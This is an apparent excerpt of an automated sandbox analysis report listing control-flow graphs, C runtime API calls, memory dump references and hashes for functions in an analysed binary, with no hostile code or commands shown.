                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                            • String ID:
                                                                                            • API String ID: 4108716018-0
                                                                                            • Opcode ID: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
                                                                                            • Instruction ID: 2cb84a8a248f1c704ed31b969d410d2ae143d87c3ddf2eb88c20de984f4c0adb
                                                                                            • Opcode Fuzzy Hash: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
                                                                                            • Instruction Fuzzy Hash: 2711E972600215AFDB01AF76ED8085A7BEDFB51321310443BE945FB290EB75EE448B9C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 248 404074-404086 call 405c14 251 404088-40408d 248->251 252 40408f-404098 248->252 253 4040b1-4040b4 251->253 254 4040b5-4040cd call 40404c call 4048fa 252->254 255 40409a-4040a9 call 40450a 252->255 264 4040d3 254->264 265 4040cf-4040d1 254->265 255->254 261 4040ab 255->261 263 4040b0 261->263 263->253 266 4040d8 call 404843 264->266 265->263 267 4040dd 266->267
                                                                                            APIs
                                                                                            • __getptd_noexit.LIBCMT ref: 0040407B
                                                                                              • Part of subcall function 00405C14: GetLastError.KERNEL32(?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C18
                                                                                              • Part of subcall function 00405C14: ___set_flsgetvalue.LIBCMT ref: 00405C26
                                                                                              • Part of subcall function 00405C14: __calloc_crt.LIBCMT ref: 00405C3A
                                                                                              • Part of subcall function 00405C14: DecodePointer.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C54
                                                                                              • Part of subcall function 00405C14: __initptd.LIBCMT ref: 00405C63
                                                                                              • Part of subcall function 00405C14: GetCurrentThreadId.KERNEL32 ref: 00405C6A
                                                                                              • Part of subcall function 00405C14: SetLastError.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C82
                                                                                            • __calloc_crt.LIBCMT ref: 0040409D
                                                                                            • __get_sys_err_msg.LIBCMT ref: 004040BB
                                                                                            • _strcpy_s.LIBCMT ref: 004040C3
                                                                                            • __invoke_watson.LIBCMT ref: 004040D8
                                                                                            Strings
                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00404088, 004040AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                            • API String ID: 69636372-798102604
                                                                                            • Opcode ID: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
                                                                                            • Instruction ID: 37372fcaa6264d988ca6bfe18943687c80e0c4479773ad4bbbf24e5db921d2ee
                                                                                            • Opcode Fuzzy Hash: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
                                                                                            • Instruction Fuzzy Hash: 29F0F0F260431067EA34392A5C8192B768CCBC0728B10483FFF09B72C2E93E9C4041EE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 268 406ba3-406bb4 269 406bd5-406be1 call 405c8d 268->269 270 406bb6-406bbb 268->270 274 406bee-406bf1 269->274 277 406be3-406be8 call 405c8d 269->277 270->269 271 406bbd-406bc2 270->271 273 406bc4-406bc9 call 405c8d 271->273 271->274 273->269 277->274
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 00406BC4
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 00406BD5
                                                                                            • __getptd.LIBCMT ref: 00406BE3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: MOC$RCC$csm
                                                                                            • API String ID: 803148776-2671469338
                                                                                            • Opcode ID: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
                                                                                            • Instruction ID: 8a2cd633cb2861bc694519b041e08bbf0c3c08e2df89b1e629200bcacebe9179
                                                                                            • Opcode Fuzzy Hash: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
                                                                                            • Instruction Fuzzy Hash: 8EE0E5711046149ED7209B65804576637A4EB48314F1640B7981EDF292E73CE8608E46

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 00406E7D
                                                                                              • Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403EC9
                                                                                              • Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403ED7
                                                                                            • __getptd.LIBCMT ref: 00406E87
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 00406E95
                                                                                            • __getptd.LIBCMT ref: 00406EA3
                                                                                            • __getptd.LIBCMT ref: 00406EAE
                                                                                            • _CallCatchBlock2.LIBCMT ref: 00406ED4
                                                                                              • Part of subcall function 00403F60: __CallSettingFrame@12.LIBCMT ref: 00403FAC
                                                                                              • Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F8A
                                                                                              • Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F98
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1602911419-0
                                                                                            • Opcode ID: 497548b4a0f4d1d7c59b81f4b10d1b4968c17110556dba6785f250f817fe4740
                                                                                            • Instruction ID: 976d35377cad4393233b57ce152850759acbe59ebf02f15ba6ab925de6b103ba
                                                                                            • Opcode Fuzzy Hash: 497548b4a0f4d1d7c59b81f4b10d1b4968c17110556dba6785f250f817fe4740
                                                                                            • Instruction Fuzzy Hash: CE11DA71C0470ADFEB00EFA5D445BAE7BB0FF08315F10806AF815A7291DB789A159F54

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 301 408388-4083a3 call 4050e0 call 405c8d 306 4083c2-4083da call 4057f2 301->306 307 4083a5-4083a9 301->307 312 408412-40841e call 408423 306->312 313 4083dc-4083de 306->313 307->306 309 4083ab 307->309 311 4083ae-4083b0 309->311 314 4083b2-4083b9 call 40391a 311->314 315 4083ba-4083c1 call 405125 311->315 312->311 316 4083e0-4083e9 InterlockedDecrement 313->316 317 4083fa-40840c InterlockedIncrement 313->317 314->315 316->317 322 4083eb-4083f1 316->322 317->312 322->317 325 4083f3-4083f9 call 4031cd 322->325 325->317
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 00408394
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __amsg_exit.LIBCMT ref: 004083B4
                                                                                            • __lock.LIBCMT ref: 004083C4
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004083E1
                                                                                            • _free.LIBCMT ref: 004083F4
                                                                                            • InterlockedIncrement.KERNEL32(02142B00), ref: 0040840C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                            • String ID:
                                                                                            • API String ID: 3470314060-0
                                                                                            • Opcode ID: 540c09528e981f4208a66600a514226a4fccadbf672c9552e231f3b896a7363d
                                                                                            • Instruction ID: 26f866d3a9e4cffc16725e27c9f70bee2afc7b4430a3ddb1174e671c2c25d147
                                                                                            • Opcode Fuzzy Hash: 540c09528e981f4208a66600a514226a4fccadbf672c9552e231f3b896a7363d
                                                                                            • Instruction Fuzzy Hash: D201ED31A01A22DBC720AF26990634E7360FB84B15F00043FE854B72D2CF7C59009BDE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 328 402160-402173 329 402175-40217a call 4026b3 328->329 330 40217f-402186 328->330 329->330 332 402188 330->332 333 40218a-40218c 330->333 332->333 334 4021ad-4021b0 333->334 335 40218e-4021aa call 402250 * 2 333->335 337 4021b2-4021b7 call 402666 334->337 338 4021bc-4021c1 334->338 337->338 339 4021c3-4021d4 call 4022e0 338->339 340 4021eb-4021ed 338->340 344 4021d6-4021de 339->344 353 40223e-402244 339->353 340->344 345 4021ef-4021f5 340->345 348 4021e0 344->348 349 4021e2-4021e5 344->349 350 402205-40220e 345->350 351 4021f7-402202 345->351 348->349 354 402211 349->354 355 4021e7-4021e9 349->355 356 402213-402227 call 402870 354->356 355->356 359 402238-40223a 356->359 360 402229-402235 356->360 359->353
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040217A
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
                                                                                              • Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004021B7
                                                                                              • Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 0040267B
                                                                                              • Part of subcall function 00402666: __CxxThrowException@8.LIBCMT ref: 00402690
                                                                                              • Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 004026A1
                                                                                            • _memmove.LIBCMT ref: 00402218
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 1615890066-4289949731
                                                                                            • Opcode ID: 0281067812997500bad516e54b5411f9a50cb522d6cb345cee96c16d53027c68
                                                                                            • Instruction ID: 7db026a3e821a4d026dc1f6adc6300752eb2c264efb36d1802d8374ad0edc79e
                                                                                            • Opcode Fuzzy Hash: 0281067812997500bad516e54b5411f9a50cb522d6cb345cee96c16d53027c68
                                                                                            • Instruction Fuzzy Hash: CA31C8323002109BD7219A9CEE84E5AF3A9EBA1764F20057FF541EB3C1D6F5DD4183A9
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBCMT ref: 00407215
                                                                                              • Part of subcall function 00407170: ___BuildCatchObjectHelper.LIBCMT ref: 004071A6
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0040722C
                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0040723A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 2163707966-3733052814
                                                                                            • Opcode ID: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
                                                                                            • Instruction ID: 9d33cda1630c614c6b8baaf9185435334ebf2647e1999c875cfe5a2f0f929500
                                                                                            • Opcode Fuzzy Hash: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
                                                                                            • Instruction Fuzzy Hash: EC014F35404109BBDF126F51CC45E9B3F6AFF08344F10402AFD18251A1D739E9B1DBA5
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 00403952
                                                                                              • Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
                                                                                              • Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
                                                                                              • Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C638,0000000C,0040580D), ref: 00404123
                                                                                            • std::exception::exception.LIBCMT ref: 00403987
                                                                                            • std::exception::exception.LIBCMT ref: 004039A1
                                                                                            • __CxxThrowException@8.LIBCMT ref: 004039B2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                            • String ID: ,>D
                                                                                            • API String ID: 1414122017-4267898978
                                                                                            • Opcode ID: 8a6a3c7fa39abc12b2286a85d02748e85cfd0c5904dff70ea72f21ec95bbc5ae
                                                                                            • Instruction ID: 9ed4f94ca6387e48f138287973f31bc1c86e6b6ed838834f4ce550f920102e7c
                                                                                            • Opcode Fuzzy Hash: 8a6a3c7fa39abc12b2286a85d02748e85cfd0c5904dff70ea72f21ec95bbc5ae
                                                                                            • Instruction Fuzzy Hash: EEF0D675800109AACB00FF56DC46A5D7F696B41B29B24443FF405B61D1CBF89B46974C
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 0040355D
                                                                                              • Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
                                                                                              • Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
                                                                                              • Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C638,0000000C,0040580D), ref: 00404123
                                                                                            • _free.LIBCMT ref: 00403570
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap_free_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 2734353464-0
                                                                                            • Opcode ID: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
                                                                                            • Instruction ID: dc83b90e6fb43b5c24848a5f74a511594923413cb778fb3891e3a705d38e000c
                                                                                            • Opcode Fuzzy Hash: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
                                                                                            • Instruction Fuzzy Hash: E511C876810515BBCB213F76AC04A5A3F9C9F807A6B20483BF549BA2E0DA7C8B51D65C
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 004080F8
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 0040810F
                                                                                            • __amsg_exit.LIBCMT ref: 0040811D
                                                                                            • __lock.LIBCMT ref: 0040812D
                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00408141
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                            • String ID:
                                                                                            • API String ID: 938513278-0
                                                                                            • Opcode ID: 20cb1fc732e579900c77d98cb4949e309b13dbbcb92f92c5b3ac46e1b7833a5a
                                                                                            • Instruction ID: b4cc1c6424e82e2a622393a5b44b334ded5da7db2e5d8471cbe447a70042a561
                                                                                            • Opcode Fuzzy Hash: 20cb1fc732e579900c77d98cb4949e309b13dbbcb92f92c5b3ac46e1b7833a5a
                                                                                            • Instruction Fuzzy Hash: ECF0C232D04B00DAE620BB7A990270A2390DF00728F11413FE4947B2D2CF7C09018B9E
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction ID: ddfa4d8130d636f3ef40e1cea94614215a6fa8e11de1469be39291c4408a14f6
                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction Fuzzy Hash: D111433204024ABBCF125E85CC05CEE3F23BF18355B598526FA1869571D73BC9B1BB86
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00403AA0), ref: 004067DD
                                                                                            • __malloc_crt.LIBCMT ref: 0040680C
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00406819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                            • String ID:
                                                                                            • API String ID: 237123855-0
                                                                                            • Opcode ID: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
                                                                                            • Instruction ID: c101f1b95c54b5ec221fdb71957a5b0ebd14c395316be2ddd09db82d21e96add
                                                                                            • Opcode Fuzzy Hash: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
                                                                                            • Instruction Fuzzy Hash: 2DF0E977501010AADB207735BC4985B1668DAD532830B843BF506E7284F9388D5182A9
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004020D5
                                                                                            • _memmove.LIBCMT ref: 00402126
                                                                                              • Part of subcall function 00402160: std::_Xinvalid_argument.LIBCPMT ref: 0040217A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                            • String ID: string too long
                                                                                            • API String ID: 2168136238-2556327735
                                                                                            • Opcode ID: 45d54a01f1f39f78f88cf84de9e82ab4799c477ca39c8fd3c8a0a3bdccddc25f
                                                                                            • Instruction ID: 39c992df188607e5b8ddcbc004ec05fc70ad42a912ba76099f8e09e79c6b7508
                                                                                            • Opcode Fuzzy Hash: 45d54a01f1f39f78f88cf84de9e82ab4799c477ca39c8fd3c8a0a3bdccddc25f
